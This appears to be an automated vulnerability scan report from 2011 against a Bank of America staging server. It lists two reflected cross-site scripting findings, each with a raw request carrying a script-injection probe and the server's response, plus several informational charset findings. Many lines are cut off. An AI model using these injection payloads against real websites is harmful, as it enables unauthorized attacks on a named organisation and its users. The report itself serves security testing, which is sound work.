1. Cross-site scripting (reflected)
1.1. http://www-stage.bankofamerica.com/surveys/bridge/surveybridge.cfm [REST URL parameter 1]
1.2. http://www-stage.bankofamerica.com/surveys/bridge/surveybridge.cfm [REST URL parameter 2]
2. HTML does not specify charset
2.1. http://www-stage.bankofamerica.com/favicon.ico
2.2. http://www-stage.bankofamerica.com/findit/error.cgi
2.3. http://www-stage.bankofamerica.com/global/mvc_objects/stylesheet/hs2_mvc_content_style.css
2.4. http://www-stage.bankofamerica.com/surveys/bridge/surveybridge.cfm
Severity: | High |
Confidence: | Certain |
Host: | http://www-stage |
Path: | /surveys/bridge |
GET /surveys1d1ef"><script>alert(1)< Host: www-stage.bankofamerica Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 12:30:02 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close <html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects </head> <body bgcolor="#ffffff" text= ...[SNIP]... <input type="hidden" name="URL" value="http://www-stage ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www-stage |
Path: | /surveys/bridge |
GET /surveys/bridge350d8"><script>alert(1)< Host: www-stage.bankofamerica Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 12:30:03 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close <html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects </head> <body bgcolor="#ffffff" text= ...[SNIP]... <input type="hidden" name="URL" value="http://www-stage ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www-stage |
Path: | /favicon.ico |
GET /favicon.ico HTTP/1.1 Host: www-stage.bankofamerica User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Cookie: throttle_value=41; TCID=0007b047-6f21-695c |
HTTP/1.1 401 Unauthorized Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 12:31:48 GMT Content-length: 223 Content-type: text/html WWW-authenticate: Basic realm="www-stage <HTML><HEAD><TITLE <BODY><H1>Unauthorized< Proper authorization is required for this area. Either your browser does not perform authorization, or your authorization has ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www-stage |
Path: | /findit/error.cgi |
POST /findit/error.cgi HTTP/1.1 Host: www-stage.bankofamerica User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www-stage Cookie: throttle_value=41; TCID=0007b047-6f21-695c Content-Type: application/x-www-form Content-Length: 155 URL=http%3A%2F%2Fwww |
HTTP/1.1 401 Unauthorized Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 12:33:55 GMT Content-length: 223 Content-type: text/html WWW-authenticate: Basic realm="www-stage <HTML><HEAD><TITLE <BODY><H1>Unauthorized< Proper authorization is required for this area. Either your browser does not perform authorization, or your authorization has ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www-stage |
Path: | /global/mvc_objects |
GET /global/mvc_objects Host: www-stage.bankofamerica User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www-stage Cookie: throttle_value=41; TCID=0007b047-6f21-695c |
HTTP/1.1 401 Unauthorized Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 12:32:11 GMT Content-length: 223 Content-type: text/html WWW-authenticate: Basic realm="www-stage <HTML><HEAD><TITLE <BODY><H1>Unauthorized< Proper authorization is required for this area. Either your browser does not perform authorization, or your authorization has ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www-stage |
Path: | /surveys/bridge |
GET /surveys/bridge Host: www-stage.bankofamerica Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 401 Unauthorized Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 12:29:58 GMT Content-length: 223 Content-type: text/html WWW-authenticate: Basic realm="www-stage Connection: close <HTML><HEAD><TITLE <BODY><H1>Unauthorized< Proper authorization is required for this area. Either your browser does not perform authorization, or your authorization has ...[SNIP]... |